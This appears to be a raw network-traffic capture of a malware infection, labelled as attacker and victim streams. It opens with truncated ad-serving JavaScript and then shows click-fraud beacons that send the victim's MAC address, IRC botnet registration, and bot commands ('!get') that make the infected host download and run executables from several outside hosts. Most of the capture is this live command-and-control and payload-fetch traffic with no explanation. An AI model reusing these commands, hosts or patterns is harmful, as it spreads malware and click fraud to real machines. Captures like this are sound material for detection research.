ATTACKER:	Of(spaceCharacters[i]) > -1){\t\t\t\t\ttitle = title.replace(spaceCharacters[i], ' ');\t\t\t\t}\t\t\t}\t\t\tfor(var j = 0; j < nullCharacters.length; j++){\t\t\t\twhile(title.indexOf(nullCharacters[j]) > -1){\t\t\t\t\ttitle = title.replace(nullCharacters[j], '');\t\t\t\t}\t\t\t}\t\t\t/remove \strange\ char - (ch<32 || (ch>126 && ch<192) || ch>255)\t\t\tfor (var i = searchstring.length - 1; i >= 0; i--) {\t\t\t    var ch = searchstring.charCodeAt(i);\t\t\t    if (ch < 32 || (ch > 126 && ch < 192) || ch == 247 || ch > 255) {\t\t\t        searchstring = searchstring.substring(0, i) + searchstring.substring(i + 1);\t\t\t    }\t\t\t}\t\t\tvar words = new Array();\t\t\tvar usedWords = new Array();\t\t\twords = title.split(' ');\t\t\twords = words.sort();\t\t\ttitle = \\;\t\t\tfor(var k = 0; k < words.length; k++){\t\t\t\tif(words[k].length <= 0 || (k > 0 && words[k-1] == words[k])) continue;\t\t\t\telse{\t\t\t\t\tusedWords.push(words[k]);\t\t\t\t}\t\t\t}\t\t\ttitle = usedWords.join(' ');\t\t\ttitles[original] = title;\t\t}\t\treturn title;\t}\tfunction CleanSearchString(searchstring)\t{\t\tif (searchstring == null || searchstring == '' || searchstring.length == 0) return '';\t\tsearchstring=CleanTags(searchstring);\t\tvar spaceCharacters = new Array('\\?', '%',  '#',  '\\&', '|', '!', '\\+', '\\^', '~', '\\\\',  '{', '}', '\\[', '\\]', '=', '<', '>', '/', ';', ':', '@', '\\.', '\', '(', ')', '\\*', '_', ',');\t\tvar nullCharacters = new Array('-', '\\\$', '`', \'\, '\227'/*8212*/, 
ATTACKER:	 '\226'/*8211*/ );\t\tvar searchStrings = new Array();\t\tif(searchstring != ''){\t\t\tvar original = searchstring;\t\t\t\t\t\tvar ss = searchStrings[searchstring];\t\t\tif(ss && ss != ''){\t\t\t\treturn ss;\t\t\t}\t\t\t\t\t\tsearchstring = unescape(searchstring.toLowerCase());\t\t\t\t\t\tfor(var i = 0; i < spaceCharacters.length; i++){\t\t\t\twhile(searchstring.indexOf(spaceCharacters[i]) > -1){\t\t\t\t\tsearchstring = searchstring.replace(spaceCharacters[i], ' ');\t\t\t\t}\t\t\t}\t\t\tfor(var j = 0; j < nullCharacters.length; j++){\t\t\t\twhile(searchstring.indexOf(nullCharacters[j]) > -1){\t\t\t\t\tsearchstring = searchstring.replace(nullCharacters[j], '');\t\t\t\t}\t\t\t}\t\t\t/remove \strange\ char - (ch<32 || (ch>126 && ch<192) || ch>255)\t\t\tfor (var i = searchstring.length - 1; i >= 0; i--) {\t\t\t    var ch = searchstring.charCodeAt(i);\t\t\t    if (ch < 32 || (ch > 126 && ch < 192) || ch == 247 || ch > 255) {\t\t\t        searchstring = searchstring.substring(0, i) + searchstring.substring(i + 1);\t\t\t    }\t\t\t}\t\t\tvar words = new Array();\t\t\tvar usedWords = new Array();\t\t\twords = searchstring.split(' ');\t\t\twords = words.sort();\t\t\tsearchstring = \\;\t\t\tfor(var k = 0; k < words.length; k++){\t\t\t\tif(words[k].length <= 0 || (k > 0 && words[k-1] == words[k])) continue;\t\t\t\telse{\t\t\t\t\tusedWords.push(words[k]);\t\t\t\t}\t\t\t}\t\t\tsearchstring = usedWords.join(' ');\t\t\tsearchStrings[original] = searchstring;\t\t}\t\treturn searchstring;\t}\t\tf 
ATTACKER:	unction GetImageFileName(advertiser, SearchString, isBrand)\t{\t\tvar key;\t\tif(!isBrand){\t\t\tkey = CleanAdvertiserName(advertiser) + '|' + CleanSearchString(SearchString) + '|100|1|0';\t\t}else{\t\t\tkey = CleanAdvertiserName(advertiser) + '||100|1|1';\t\t}\t\tvar file = hex_md5(key);\t\treturn file.substr(0,1) + '/' + file.substr(1,2) + '/' + file.substr(3,2) + '/' + file.substring(5,file.length) + '.jpg';\t}\tfunction GetAdImageFileName(advertiser, title, desc)\t{\t\tvar key;\t\t\t\tkey = CleanAdvertiserName(advertiser) + '|' + CleanTitleDescription(title + ' ' + desc) + '|100|1|0';\t\t\t\tvar file = hex_md5(key);\t\treturn file.substr(0,1) + '/' + file.substr(1,2) + '/' + file.substr(3,2) + '/' + file.substring(5,file.length) + '.jpg';\t}\tfunction ReplaceW(ss)\t{\t\tvar r, re; \t\tre = /width\\s*=\\s*[\']?\\d+[\']?/ig;\t\tr = ss.replace(re, \\);\t\treturn(r); \t}\t\tfunction GetIAProductImageDetails(searchString, title, description, advertiser, attributes, docWrite)\t{\t\tif(searchString==undefined || searchString==null || searchString=='' || \t\t   advertiser==undefined || advertiser==null || advertiser=='')\t\t{\t\t\tsearchString = 'error';\t\t\tadvertiser = 'error';\t\t}\t\t/may18\t\tif (advertiser.length>120)\t{\tadvertiser = advertiser.substring(0,119);}\t\tif (searchString.length>250)\t{\tsearchString = searchString.substring(0,249);}\t\tif (title.length>250)\t\t{\ttitle = title.substring(0,249);}\t\tattributes = Repla 
ATTACKER:	ceW(attributes);\t\tif(docWrite == null){(docWrite = true)}\t\t\t\tif (searchString != null && searchString != '' && searchString.length > 0) \t\t{\t\t\tvar prod = GetImageFileName(advertiser, searchString, false);\t\t}\t\telse\t\t{\t\t\tvar prod = GetAdImageFileName(advertiser, title, description);\t\t}\t\tvar qs = 'ss=' + CleanTags(searchString) + '&adv=' + CleanTags(advertiser) + '&ttl=' + CleanTags(title) + '&des=' + CleanTags(description);\t\tvar qsEnc = EncDec.doEncode(qs);\t\tvar file = 'http:/cr0.worthathousandwords.com/' + prod + '?pid=' + PropertyID + '&qs=' + qsEnc;\t\tif(docWrite)\t\t{\t\t\tdocument.write('');\t\t\t}\t\treturn(file);\t}\tfunction GetIABrandImageDetails(searchString, advertiser, attributes, docWrite)\t{\t\tif(searchString==undefined || searchString==null || searchString=='' || \t\t   advertiser==undefined || advertiser==null || advertiser=='')\t\t{\t\t\tsearchString = 'error';\t\t\tadvertiser = 'error';\t\t}\t\t/may18\t\tif (advertiser.length>120)\t{\tadvertiser = advertiser.substring(0,119);}\t\tattributes = ReplaceW(attributes);\t\tif(docWrite == null){(docWrite = true)}\t\tvar brand = GetImageFileName(advertiser, '', true);\t\tvar qs = 'adv=' + CleanTags(advertiser);\t\tvar qsEnc = EncDec.doEncode(qs);\t\tvar file = 'http:/cr0.worthathousandwords.com/' + brand + '?pid=' + PropertyID + '&qs=' + qsEnc;\t\tif(docWrite)\t\t{\t\t\tdocument.write('');\t\t\t}\t\treturn(file);\t} 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=bigbuy HTTP/1.1Host: in.7cy.netUser-Agent: ClickAdsByIE 0.7.3Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/in.7cy.net/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close 
ATTACKER:	NICK bxhhocwuUSER s020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG bxhhocwu :!get http:/ad.ghura.pl/dm.exe:u. PRIVMSG bxhhocwu :!get http:/ku.perfectexe.com:88/WINC.exe:u. PRIVMSG bxhhocwu :!get http:/vbmcom.com/read.txt 
ATTACKER:	GET /dm.exe HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache 
ATTACKER:	GET /WINC.exe HTTP/1.0User-Agent: DownloadHost: ku.perfectexe.com:88Pragma: no-cache 
ATTACKER:	GET /pk/ucsp0416.exe?t=0.8955456 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 64.79.86.26 
ATTACKER:	GET /w.exe?t=0.8255274 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ku.perfectexe.com:88 
ATTACKER:	GET /read.txt HTTP/1.0User-Agent: DownloadHost: vbmcom.comPragma: no-cache 
ATTACKER:	GET /banner.exe?t=0.9234675 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sky.perfectexe.com:555 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=bigbuy HTTP/1.1Host: in.7cy.netUser-Agent: ClickAdsByIE 0.7.3Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: zh-cn,zh;q=0.5Referer: http:/in.7cy.net/p6.aspContent-Type: application/x-www-form-urlencodedConnection: Close